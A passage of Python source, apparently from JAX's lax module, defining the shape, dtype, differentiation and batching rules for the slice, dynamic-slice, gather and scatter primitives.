result = pad(t, _const(t, 0), pads)
assert result.shape == operand_shape, (
f"result.shape={result.shape} operand_shape={operand_shape}")
return [result]
def _slice_batching_rule(batched_args, batch_dims, *, start_indices,
limit_indices, strides):
operand, = batched_args
bdim, = batch_dims
new_start_indices = list(start_indices)
new_start_indices.insert(bdim, 0)
new_limit_indices = list(limit_indices)
new_limit_indices.insert(bdim, operand.shape[bdim])
if strides is None:
new_strides = None
else:
new_strides = list(strides)
new_strides.insert(bdim, 1)
out = slice(operand, new_start_indices, new_limit_indices, new_strides)
return out, bdim
def _slice_masking_rule(
padded_vals, logical_shapes, start_indices, limit_indices, strides):
operand, = padded_vals
strides = masking.padded_shape_as_value(strides) if strides else None
return slice(operand,
start_indices=masking.padded_shape_as_value(start_indices),
limit_indices=masking.padded_shape_as_value(limit_indices),
strides=strides)
slice_p = standard_primitive(_slice_shape_rule, _input_dtype, 'slice',
_slice_translation_rule)
ad.deflinear2(slice_p, _slice_transpose_rule)
batching.primitive_batchers[slice_p] = _slice_batching_rule
masking.masking_rules[slice_p] = _slice_masking_rule
def _dynamic_slice_shape_rule(operand, *start_indices, slice_sizes):
if operand.ndim != len(start_indices):
msg = ("dynamic_slice start_indices must have length equal to the number "
"of dimensions of the operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if len(start_indices) != len(slice_sizes):
msg = ("dynamic_slice slice_sizes must have the same length as "
"start_indices, got start_inidices length {} and slice_sizes {}.")
raise TypeError(msg.format(len(start_indices), slice_sizes))
if not np.all(np.less_equal(slice_sizes, operand.shape)):
msg = ("slice slice_sizes must be less than or equal to operand shape, "
"got slice_sizes {} for operand shape {}.")
raise TypeError(msg.format(slice_sizes, operand.shape))
if not np.all(np.greater_equal(slice_sizes, 0)):
msg = ("slice slice_sizes must be greater than or equal to zero, "
"got slice_sizes of {}.")
raise TypeError(msg.format(slice_sizes))
return tuple(slice_sizes)
def _dynamic_slice_dtype_rule(operand, *start_indices, slice_sizes):
if any(i.dtype != start_indices[0].dtype or
not dtypes.issubdtype(i.dtype, np.integer) for i in start_indices):
msg = ("index arguments to dynamic_slice must be integers of the same "
"type, got: {}")
raise TypeError(msg.format(", ".join(i.dtype.name for i in start_indices)))
return operand.dtype
def _dynamic_slice_translation_rule(c, operand, *start_indices, slice_sizes):
return xops.DynamicSlice(operand, start_indices, slice_sizes)
def _dynamic_slice_jvp(primals, tangents, *, slice_sizes):
tangent_out = tangents[0]
if type(tangent_out) is not ad_util.Zero:
tangent_out = dynamic_slice(tangent_out, primals[1:], slice_sizes)
return dynamic_slice(primals[0], primals[1:], slice_sizes), tangent_out
def _dynamic_slice_transpose_rule(t, operand, *start_indices, slice_sizes):
assert ad.is_undefined_primal(operand)
assert all(not ad.is_undefined_primal(s) for s in start_indices)
operand_shape, operand_dtype = operand.aval.shape, operand.aval.dtype
if type(t) is ad_util.Zero:
return [ad_util.Zero(operand.aval)] + [None] * len(start_indices)
else:
if config.omnistaging_enabled:
zeros = full(operand_shape, 0, operand_dtype)
else:
zeros = full(operand_shape, tie_in(t, _zero(t)))
return ([dynamic_update_slice(zeros, t, start_indices)] +
[None] * len(start_indices))
def _batch_dynamic_slice_indices(indices, bdims):
if len(indices) == 0:
return np.array([], 'int32'), None
size = next((x.shape[i] for x, i in zip(indices, bdims) if i is not None), -1)
if size < 0:
return concatenate([broadcast(i, (1,)) for i in indices], 0), None
indices = concatenate(
[broadcast_in_dim(x, (size, 1),
broadcast_dimensions=((0,) if i is not None else ()))
for x, i in zip(indices, bdims)],
dimension=1)
return indices, 0
def _dynamic_slice_batching_rule(batched_args, batch_dims, *, slice_sizes):
# A dynamic slice is a special case of gather; we can delegate to the gather
# batching rule.
# TODO(phawkins): consider removing dynamic_slice entirely and using gather
# always.
operand, *start_indices = batched_args
operand_bd, *start_idx_bds = batch_dims
operand_shape = (operand.shape if operand_bd is batching.not_mapped
else tuple(np.delete(operand.shape, operand_bd)))
dims = tuple(range(len(operand_shape)))
dnums = GatherDimensionNumbers(offset_dims=dims, collapsed_slice_dims=(),
start_index_map=dims)
index, index_bdim = _batch_dynamic_slice_indices(start_indices, start_idx_bds)
return _gather_batching_rule(
[operand, index], [operand_bd, index_bdim], dimension_numbers=dnums,
slice_sizes=slice_sizes)
dynamic_slice_p = standard_primitive(
_dynamic_slice_shape_rule, _dynamic_slice_dtype_rule, 'dynamic_slice',
_dynamic_slice_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[dynamic_slice_p] = _dynamic_slice_jvp # TODO
ad.primitive_transposes[dynamic_slice_p] = _dynamic_slice_transpose_rule
batching.primitive_batchers[dynamic_slice_p] = _dynamic_slice_batching_rule
def _dynamic_update_slice_shape_rule(operand, update, *start_indices):
if operand.ndim != update.ndim:
msg = ("dynamic_update_slice update must have the same rank as operand, "
"got update shape {} for operand shape {}.")
raise TypeError(msg.format(update.shape, operand.shape))
if operand.ndim != len(start_indices):
msg = ("dynamic_update_slice start_indices must have length equal to the "
"rank of operand, got indices {} for operand shape {}.")
raise TypeError(msg.format(start_indices, operand.shape))
if not np.all(np.less_equal(update.shape, operand.shape)):
msg = ("dynamic_update_slice update shape must be smaller than operand "
"shape, got update shape {} for operand shape {}.")
raise TypeError(msg.format(update.shape, operand.shape))
return operand.shape
def _dynamic_update_slice_dtype_rule(operand, update, *start_indices):
_check_same_dtypes("dynamic_update_slice", False, operand.dtype, update.dtype)
if any(i.dtype != start_indices[0].dtype or
not dtypes.issubdtype(i.dtype, np.integer) for i in start_indices):
msg = ("index arguments to dynamic_update_slice must be integers of the "
"same type, got {}")
raise TypeError(msg.format(", ".join(i.dtype.name for i in start_indices)))
return operand.dtype
def _dynamic_update_slice_jvp(primals, tangents):
operand, update = primals[:2]
start_indices = primals[2:]
g_operand, g_update = tangents[:2]
val_out = dynamic_update_slice(operand, update, start_indices)
if type(g_operand) is ad_util.Zero and type(g_update) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_update = ad.instantiate_zeros(g_update)
tangent_out = dynamic_update_slice(g_operand, g_update, start_indices)
return val_out, tangent_out
def _dynamic_update_slice_transpose_rule(t, operand, update, *start_indices):
assert all(not ad.is_undefined_primal(x) for x in start_indices)
if ad.is_undefined_primal(update):
update_shape = update.aval.shape
else:
update_shape = update.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(update.aval) if ad.is_undefined_primal(update) else None
else:
dus = dynamic_update_slice
ds = dynamic_slice
zeros = _zeros(t, shape=update_shape)
operand_t = dus(t, zeros, start_indices) if ad.is_undefined_primal(operand) else None
update_t = ds(t, start_indices, update_shape) if ad.is_undefined_primal(update) else None
return [operand_t, update_t] + [None] * len(start_indices)
def _dynamic_update_slice_translation_rule(c, operand, update, *start_indices):
return xops.DynamicUpdateSlice(operand, update, start_indices)
def _dynamic_update_slice_batching_rule(batched_args, batch_dims):
# A dynamic update slice is a special case of scatter; we can delegate to the
# scatter batching rule.
# TODO(phawkins): consider removing dynamic_update_slice entirely and using
# scatter always.
operand, update, *start_idx = batched_args
operand_bd, update_bd, *start_idx_bd = batch_dims
update_shape = (np.shape(update) if update_bd is batching.not_mapped
else tuple(np.delete(np.shape(update), update_bd)))
dims = tuple(range(len(update_shape)))
dnums = ScatterDimensionNumbers(update_window_dims=dims,
inserted_window_dims=(),
scatter_dims_to_operand_dims=dims)
index, index_bdim = _batch_dynamic_slice_indices(start_idx, start_idx_bd)
return _scatter_batching_rule(
scatter, (operand, index, update), (operand_bd, index_bdim, update_bd),
update_jaxpr=None, update_consts=None, dimension_numbers=dnums,
indices_are_sorted=True, unique_indices=True)
dynamic_update_slice_p = standard_primitive(
_dynamic_update_slice_shape_rule, _dynamic_update_slice_dtype_rule,
'dynamic_update_slice', _dynamic_update_slice_translation_rule)
ad.primitive_jvps[dynamic_update_slice_p] = _dynamic_update_slice_jvp
ad.primitive_transposes[dynamic_update_slice_p] = \
_dynamic_update_slice_transpose_rule
batching.primitive_batchers[dynamic_update_slice_p] = \
_dynamic_update_slice_batching_rule
def _gather_dimensions_proto(indices_shape, dimension_numbers):
assert type(dimension_numbers) is GatherDimensionNumbers
proto = xla_client.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape.rank() > 0
proto.index_vector_dim = indices_shape.rank() - 1
return proto
def _gather_dtype_rule(operand, start_indices, **kwargs):
if not dtypes.issubdtype(start_indices.dtype, np.integer):
raise ValueError("start_indices must have an integer type")
return dtypes.canonicalize_dtype(operand.dtype)
_rank = lambda arr: len(arr.shape)
def _is_sorted(dims, op_name, name):
for i in range(1, len(dims)):
if dims[i] < dims[i - 1]:
raise TypeError(f"{name} in {op_name} op must be sorted; got {dims}")
def _sorted_dims_in_range(dims, rank, op_name, name):
if len(dims) == 0:
return
invalid_dim = None
if dims[0] < 0:
invalid_dim = dims[0]
elif dims[-1] >= rank:
invalid_dim = dims[-1]
if invalid_dim:
raise TypeError(f"Invalid {name} set in {op_name} op; valid range is "
f"[0, {rank}); got: {invalid_dim}.")
def _no_duplicate_dims(dims, op_name, name):
if len(set(dims)) != len(dims):
raise TypeError(f"{name} in {op_name} op must not repeat; got: {dims}.")
def _gather_shape_rule(operand, start_indices, *, dimension_numbers,
slice_sizes):
"""Validates the well-formedness of the arguments to Gather.
The code implements the checks based on the detailed operation semantics of
XLA's `Gather <https://www.tensorflow.org/xla/operation_semantics#gather>`_
operator and following the outline of the implementation of
ShapeInference::InferGatherShape in TensorFlow.
"""
offset_dims = dimension_numbers.offset_dims
collapsed_slice_dims = dimension_numbers.collapsed_slice_dims
start_index_map = dimension_numbers.start_index_map
# Note: in JAX, index_vector_dim is always computed as below, cf. the
# documentation of the GatherDimensionNumbers class.
index_vector_dim = _rank(start_indices) - 1
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if _rank(start_indices) < index_vector_dim or index_vector_dim < 0:
raise TypeError(f"Gather index leaf dimension must be within [0, rank("
f"start_indices) + 1). rank(start_indices) is "
f"{_rank(start_indices)} and gather index leaf dimension "
f"is {index_vector_dim}.")
expanded_start_indices_shape = list(start_indices.shape)
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if len(expanded_start_indices_shape) == index_vector_dim:
expanded_start_indices_shape.append(1)
# Start ValidateGatherDimensions
# In the error messages output by XLA, "offset_dims" is called "Output window
# dimensions" in error messages. For consistency's sake, our error messages
# stick to "offset_dims".
_is_sorted(offset_dims, "gather", "offset_dims")
_no_duplicate_dims(offset_dims, "gather", "offset_dims")
output_offset_dim_count = len(offset_dims)
output_shape_rank = len(offset_dims) + _rank(start_indices) - 1
for i in range(output_offset_dim_count):
offset_dim = offset_dims[i]
if offset_dim < 0 or offset_dim >= output_shape_rank:
raise TypeError(f"Offset dimension {i} in gather op is out of bounds; "
f"got {offset_dim}, but should have been in "
f"[0, {output_shape_rank})")
if len(start_index_map) != start_indices.shape[index_vector_dim]:
raise TypeError(f"Gather op has {len(start_index_map)} elements in "
f"start_index_map and the bound of dimension "
f"index_vector_dim={index_vector_dim} of start_indices is "
f"{start_indices.shape[index_vector_dim]}. These two "
f"numbers must be equal.")
for i in range(len(start_index_map)):
operand_dim_for_start_index_i = start_index_map[i]
if (operand_dim_for_start_index_i < 0 or
operand_dim_for_start_index_i >= _rank(operand)):
raise TypeError(f"Invalid start_index_map; domain is "
f"[0, {_rank(operand)}), got: "
f"{i}->{operand_dim_for_start_index_i}.")
_no_duplicate_dims(start_index_map, "gather", "start_index_map")
# _is_sorted and _sorted_dims_in_range are checked in the opposite order
# compared to the XLA implementation. In cases when the input is not sorted
# AND there are problematic collapsed_slice_dims, the error message will thus
# be different.
_is_sorted(collapsed_slice_dims, "gather", "collapsed_slice_dims")
_sorted_dims_in_range(collapsed_slice_dims, _rank(operand), "gather",
"collapsed_slice_dims")
_no_duplicate_dims(collapsed_slice_dims, "gather", "collapsed_slice_dims")
# End ValidateGatherDimensions
if _rank(operand) != len(slice_sizes):
raise TypeError(f"Gather op must have one slice size for every input "
f"dimension; got: len(slice_sizes)={len(slice_sizes)}, "
f"input_shape.rank={_rank(operand)}")
if len(slice_sizes) != len(offset_dims) + len(collapsed_slice_dims):
raise TypeError(f"All components of the offset index in a gather op must "
f"either be a offset dimension or explicitly collapsed; "
f"got len(slice_sizes)={len(slice_sizes)}, "
f"output_slice_sizes={offset_dims}, collapsed_slice_dims="
f"{collapsed_slice_dims}.")
for i in range(len(slice_sizes)):
slice_size = slice_sizes[i]
corresponding_input_size = operand.shape[i]
if slice_size < 0 or slice_size > corresponding_input_size:
raise TypeError(f"Slice size at index {i} in gather op is out of range, "
f"must be within [0, {corresponding_input_size + 1}), "
f"got {slice_size}.")
for i in range(len(collapsed_slice_dims)):
bound = slice_sizes[collapsed_slice_dims[i]]
if bound > 1:
raise TypeError(f"Gather op can only collapse slice dims with bound 1 "
f"or 0, but bound is {bound} for index "
f"{collapsed_slice_dims[i]} at position {i}.")
expanded_start_indices_shape.pop(index_vector_dim)
start_indices_shape = iter(expanded_start_indices_shape)
slice_sizes = iter(np.delete(slice_sizes, collapsed_slice_dims))
return tuple(next(slice_sizes) if i in offset_dims
else next(start_indices_shape) for i in range(output_shape_rank))
def _gather_translation_rule(c, operand, start_indices, *, dimension_numbers,
slice_sizes):
indices_shape = c.get_shape(start_indices)
return xops.Gather(
operand, start_indices,
_gather_dimensions_proto(indices_shape, dimension_numbers), slice_sizes,
indices_are_sorted=False)
def _gather_jvp_rule(g, operand, start_indices, *, dimension_numbers,
slice_sizes):
return gather(g, start_indices, dimension_numbers, slice_sizes)
def _gather_transpose_rule(t, operand, start_indices, *, dimension_numbers,
slice_sizes):
assert ad.is_undefined_primal(operand)
operand_shape = operand.aval.shape
if type(t) is ad_util.Zero:
out = ad_util.Zero(operand.aval)
else:
if config.omnistaging_enabled:
zeros = full(operand_shape, _zero(t))
else:
zeros = full(operand_shape, tie_in(t, _zero(t)))
scatter_dnums = ScatterDimensionNumbers(
update_window_dims=dimension_numbers.offset_dims,
inserted_window_dims=dimension_numbers.collapsed_slice_dims,
scatter_dims_to_operand_dims=dimension_numbers.start_index_map)
out = scatter_add(zeros, start_indices, t, scatter_dnums,
indices_are_sorted=False,
unique_indices=False)
return [out, None]
def _gather_batching_rule(batched_args, batch_dims, *, dimension_numbers,
slice_sizes):
operand, start_indices = batched_args
operand_bdim, start_indices_bdim = batch_dims
if operand_bdim is not None and start_indices_bdim is None:
operand = batching.moveaxis(operand, operand_bdim, 0)
slice_sizes = (operand.shape[0],) + slice_sizes
offset_dims = (0,) + tuple(np.add(1, dimension_numbers.offset_dims))
collapsed_slice_dims = tuple(np.add(1, dimension_numbers.collapsed_slice_dims))
start_index_map = tuple(np.add(1, dimension_numbers.start_index_map))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=collapsed_slice_dims,
start_index_map=start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
elif operand_bdim is None and start_indices_bdim is not None:
start_indices = batching.moveaxis(start_indices, start_indices_bdim, 0)
offset_dims = tuple(np.add(1, dimension_numbers.offset_dims))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=dimension_numbers.collapsed_slice_dims,
start_index_map=dimension_numbers.start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
else:
# move batch dimensions to the front to simplify logic
operand = batching.moveaxis(operand, operand_bdim, 0)
start_indices = batching.moveaxis(start_indices, start_indices_bdim, 0)
# Example: user code had start_indices shape (3, 4, 5), and we have to deal
# with start_indices shape (7, 3, 4, 5). We transform that to a
# start_indices of shape (7, 3, 4, 6) where we concatenated an iota that
# counts along our batch dimension to the front of the ndindex.
count_shape = list(start_indices.shape)
count_shape[-1] = 1
counts = broadcasted_iota(start_indices.dtype, tuple(count_shape), 0)
start_indices = concatenate([counts, start_indices], len(count_shape) - 1)
slice_sizes = (_min(operand.shape[0], 1),) + slice_sizes
collapsed_slice_dims = (0,) + tuple(np.add(1, dimension_numbers.collapsed_slice_dims))
offset_dims = tuple(np.add(1, dimension_numbers.offset_dims))
start_index_map = (0,) + tuple(np.add(1, dimension_numbers.start_index_map))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=collapsed_slice_dims,
start_index_map=start_index_map)
return gather(operand, start_indices, dimension_numbers=dnums,
slice_sizes=slice_sizes), 0
gather_p = standard_primitive(
_gather_shape_rule, _gather_dtype_rule, 'gather',
_gather_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.defjvp(gather_p, _gather_jvp_rule, None)
ad.primitive_transposes[gather_p] = _gather_transpose_rule
batching.primitive_batchers[gather_p] = _gather_batching_rule
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
assert type(dimension_numbers) is ScatterDimensionNumbers
proto = xla_client.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape.rank() > 0
proto.index_vector_dim = indices_shape.rank() - 1
return proto
def _scatter_dtype_rule(operand, scatter_indices, updates, **kwargs):
if not dtypes.issubdtype(scatter_indices.dtype, np.integer):
raise ValueError("scatter_indices must have an integer type")
_check_same_dtypes("scatter", False, operand.dtype, updates.dtype)
return dtypes.canonicalize_dtype(operand.dtype)
def _scatter_shape_rule(operand, scatter_indices, updates, *, update_jaxpr,
update_consts, dimension_numbers, indices_are_sorted,
unique_indices):
"""Validates the well-formedness of the ``dimension_numbers`` argument to
Scatter.
The code implements the checks based on the detailed operation semantics of
XLA's `Scatter <https://www.tensorflow.org/xla/operation_semantics#scatter>`_
operator and following the outline of the implementation of
ShapeInference::InferScatterShape in TensorFlow.
"""
update_window_dims = dimension_numbers.update_window_dims
inserted_window_dims = dimension_numbers.inserted_window_dims
scatter_dims_to_operand_dims = dimension_numbers.scatter_dims_to_operand_dims
# Note: in JAX, index_vector_dim is always computed as below, cf. the
# documentation of the ScatterDimensionNumbers class.
index_vector_dim = _rank(scatter_indices) - 1
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if _rank(scatter_indices) < index_vector_dim or index_vector_dim < 0:
raise TypeError(f"Scatter index leaf dimension must be within [0, "
f"rank(scatter_indices) + 1). rank(scatter_indices) is "
f"{_rank(scatter_indices)} and scatter index leaf "
f"dimension is {index_vector_dim}.")
expanded_scatter_indices_shape = list(scatter_indices.shape)
# This case should never happen in JAX, due to the implicit construction of
# index_vector_dim, but is included for completeness.
if len(expanded_scatter_indices_shape) == index_vector_dim:
expanded_scatter_indices_shape.append(1)
expected_updates_rank = (len(expanded_scatter_indices_shape) - 1 +
len(update_window_dims))
if _rank(updates) != expected_updates_rank:
raise TypeError(f"Updates tensor must be of rank {expected_updates_rank}; "
f"got {_rank(updates)}.")
# Validate update_window_dims
_is_sorted(update_window_dims, "scatter", "update_window_dims")
_no_duplicate_dims(update_window_dims, "scatter", "update_window_dims")
_sorted_dims_in_range(update_window_dims, _rank(updates), "scatter",
"update_window_dims")
# Validate inserted_window_dims
_is_sorted(inserted_window_dims, "scatter", "inserted_window_dims")
_no_duplicate_dims(inserted_window_dims, "scatter", "inserted_window_dims")
_sorted_dims_in_range(inserted_window_dims, _rank(operand), "scatter",
"inserted_window_dims")
# Validate window_size
window_size = len(update_window_dims) + len(inserted_window_dims)
if _rank(operand) != window_size:
raise TypeError(f"Scatter op has window of size {window_size}; doesn't "
f"match operand of rank {_rank(operand)}.")
# Validate scatter_dims_to_operand_dims
if (len(scatter_dims_to_operand_dims) !=
scatter_indices.shape[index_vector_dim]):
raise TypeError(f"Scatter op has {len(scatter_dims_to_operand_dims)} "
f"elements in scatter_dims_to_operand_dims and the bound "
f"of dimension index_vector_dim={index_vector_dim} of "
f"scatter_indices is "
f"{scatter_indices.shape[index_vector_dim]}. These two "
f"numbers must be equal")
for i in range(len(scatter_dims_to_operand_dims)):
dim = scatter_dims_to_operand_dims[i]
if dim < 0 or dim >= _rank(operand):
raise TypeError(f"Invalid scatter_dims_to_operand_dims mapping; domain "
f"is [0, {_rank(operand)}), got: {i}->{dim}.")
_no_duplicate_dims(scatter_dims_to_operand_dims, "scatter",
"scatter_dims_to_operand_dims")
max_update_slice_sizes = [operand.shape[i] for i in range(len(operand.shape))
if not i in set(inserted_window_dims)]
for i in range(len(update_window_dims)):
update_window_dim = update_window_dims[i]
if updates.shape[update_window_dim] > max_update_slice_sizes[i]:
raise TypeError(f"Bounds of the window dimensions of updates must not "
f"exceed the bounds of the corresponding dimensions of "
f"operand. For dimension {update_window_dim}, updates "
f"bound is {updates.shape[update_window_dim]}, operand "
f"bound is {max_update_slice_sizes[i]}.")
update_scatter_dims = [dim for dim in range(_rank(updates)) if dim not in
set(update_window_dims)]
scatter_dims_seen = 0
for i in update_scatter_dims:
if scatter_dims_seen == index_vector_dim:
scatter_dims_seen += 1
if updates.shape[i] != expanded_scatter_indices_shape[scatter_dims_seen]:
raise TypeError(f"Bounds of the scatter dimensions of updates must be "
f"the same as the bounds of the corresponding dimensions "
f"of scatter indices. For scatter dimension {i}, updates "
f"bound is {updates.shape[i]}, scatter_indices bound is "
f"{expanded_scatter_indices_shape[scatter_dims_seen]}.")
scatter_dims_seen += 1
return operand.shape
def _scatter_translation_rule(c, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
dtype = c.get_shape(operand).numpy_dtype()
init_value = xb.constant(c, np.array(0, dtype))
update_computation = _reduction_computation(
c, update_jaxpr, update_consts, init_value)
indices_shape = c.get_shape(scatter_indices)
return xops.Scatter(operand, scatter_indices, updates, update_computation,
_scatter_dimensions_proto(indices_shape, dimension_numbers),
indices_are_sorted, unique_indices)
def _scatter_add_translation_rule(
c, operand, scatter_indices, updates, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
expand_complex128=False):
dtype = c.get_shape(operand).numpy_dtype()
scatter_dims = _scatter_dimensions_proto(c.get_shape(scatter_indices),
dimension_numbers)
def _make_reducer(dtype):
subc = xla_bridge.make_computation_builder("scatter_add_reducer")
shape = xc.Shape.array_shape(np.dtype(dtype), ())
args = [xb.parameter(subc, 0, shape), xb.parameter(subc, 1, shape)]
out = xops.Add(args[0], args[1])
return subc.build(out)
if expand_complex128 and dtype == np.complex128:
update_computation = _make_reducer(np.float64)
re = xops.Scatter(xops.Real(operand), scatter_indices, xops.Real(updates),
update_computation, scatter_dims, indices_are_sorted,
unique_indices)
im = xops.Scatter(xops.Imag(operand), scatter_indices, xops.Imag(updates),
update_computation, scatter_dims, indices_are_sorted,
unique_indices)
return xops.Complex(re, im)
else:
update_computation = _make_reducer(dtype)
return xops.Scatter(operand, scatter_indices, updates, update_computation,
scatter_dims, indices_are_sorted, unique_indices)
def _scatter_add_jvp(primals, tangents, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
val_out = scatter_add_p.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
tangent_out = scatter_add_p.bind(
g_operand, scatter_indices, g_updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
return val_out, tangent_out
def _scatter_add_transpose_rule(t, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
assert not ad.is_undefined_primal(scatter_indices)
if ad.is_undefined_primal(updates):
updates_shape = updates.aval.shape
else:
updates_shape = updates.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(updates.aval) if ad.is_undefined_primal(updates) else None
else:
operand_t = update_t = None
if ad.is_undefined_primal(operand):
operand_t = t
if ad.is_undefined_primal(updates):
gather_dnums = GatherDimensionNumbers(
offset_dims=dimension_numbers.update_window_dims,
collapsed_slice_dims=dimension_numbers.inserted_window_dims,
start_index_map=dimension_numbers.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(t.shape)):
if i in dimension_numbers.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[dimension_numbers.update_window_dims[pos]])
pos += 1
update_t = gather(t, scatter_indices, dimension_numbers=gather_dnums,
slice_sizes=slice_sizes)
return [operand_t, None, update_t]
def _scatter_mul_transpose_rule(t, operand, scatter_indices, updates, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
assert not ad.is_undefined_primal(scatter_indices)
if ad.is_undefined_primal(updates):
updates_shape = updates.aval.shape
else:
updates_shape = updates.shape
if type(t) is ad_util.Zero:
operand_t = ad_util.Zero(operand.aval) if ad.is_undefined_primal(operand) else None
update_t = ad_util.Zero(updates.aval) if ad.is_undefined_primal(updates) else None
else:
operand_t = update_t = None
if ad.is_undefined_primal(operand):
operand_t = scatter_mul(
t, scatter_indices, updates, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
if ad.is_undefined_primal(updates):
gather_dnums = GatherDimensionNumbers(
offset_dims=dimension_numbers.update_window_dims,
collapsed_slice_dims=dimension_numbers.inserted_window_dims,
start_index_map=dimension_numbers.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(t.shape)):
if i in dimension_numbers.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[dimension_numbers.update_window_dims[pos]])
pos += 1
update_t = gather(mul(t, operand), scatter_indices,
dimension_numbers=gather_dnums, slice_sizes=slice_sizes)
return [operand_t, None, update_t]
def _scatter_batching_rule(scatter_op, batched_args, batch_dims, *,
update_jaxpr, update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
operand, scatter_indices, updates = batched_args
operand_bdim, scatter_indices_bdim, updates_bdim = batch_dims
del update_jaxpr, update_consts # Unused.
# move the operand batch dim to the front if it is not None, otherwise create
# it at the front (so that we can scatter into it)
size = next(x.shape[ax] for x, ax in zip(batched_args, batch_dims)
if ax is not None)
operand = batching.bdim_at_front(operand, operand_bdim, size)
operand_bdim = 0
updates = batching.bdim_at_front(updates, updates_bdim, size)
if scatter_indices_bdim is None:
inserted_window_dims = tuple(np.add(1, dimension_numbers.inserted_window_dims))
update_window_dims = (0,) + tuple(np.add(1, dimension_numbers.update_window_dims))
scatter_dims_to_operand_dims = tuple(np.add(1, dimension_numbers.scatter_dims_to_operand_dims))
dnums = ScatterDimensionNumbers(
update_window_dims=update_window_dims,
inserted_window_dims=inserted_window_dims,
scatter_dims_to_operand_dims=scatter_dims_to_operand_dims)
return scatter_op(
operand, scatter_indices, updates, dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices), 0
# see the third case in _gather_batching_rule for comparison and comments
scatter_indices = batching.bdim_at_front(
scatter_indices, scatter_indices_bdim, size)
count_shape = list(scatter_indices.shape)
count_shape[-1] = 1
counts = broadcasted_iota(scatter_indices.dtype, tuple(count_shape), 0)
scatter_indices = concatenate([counts, scatter_indices],
len(count_shape) - 1)
update_window_dims = tuple(np.add(1, dimension_numbers.update_window_dims))
inserted_window_dims = (0,) + tuple(np.add(1, dimension_numbers.inserted_window_dims))
scatter_dims_to_operand_dims = (0,) + tuple(np.add(1, dimension_numbers.scatter_dims_to_operand_dims))
dnums = ScatterDimensionNumbers(
update_window_dims=update_window_dims,
inserted_window_dims=inserted_window_dims,
scatter_dims_to_operand_dims=scatter_dims_to_operand_dims)
return scatter_op(
operand, scatter_indices, updates, dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices), 0
scatter_add_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-add',
_scatter_add_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[scatter_add_p] = _scatter_add_jvp
ad.primitive_transposes[scatter_add_p] = _scatter_add_transpose_rule
batching.primitive_batchers[scatter_add_p] = (
partial(_scatter_batching_rule, scatter_add))
xla.backend_specific_translations['gpu'][scatter_add_p] = partial(
_scatter_add_translation_rule, expand_complex128=True)
scatter_mul_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-mul',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
def _scatter_mul_jvp_rhs(g, x, i, y, *, dimension_numbers,
indices_are_sorted, unique_indices, **kw):
return mul(x, scatter_add(
zeros_like_array(x), i, g, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices))
ad.defjvp(scatter_mul_p,
lambda g, x, i, y, **kw: scatter_mul_p.bind(g, i, y, **kw),
None,
_scatter_mul_jvp_rhs)
ad.primitive_transposes[scatter_mul_p] = _scatter_mul_transpose_rule
batching.primitive_batchers[scatter_mul_p] = (
partial(_scatter_batching_rule, scatter_mul))
def _scatter_extremal_jvp(scatter_op, primals, tangents, update_jaxpr,
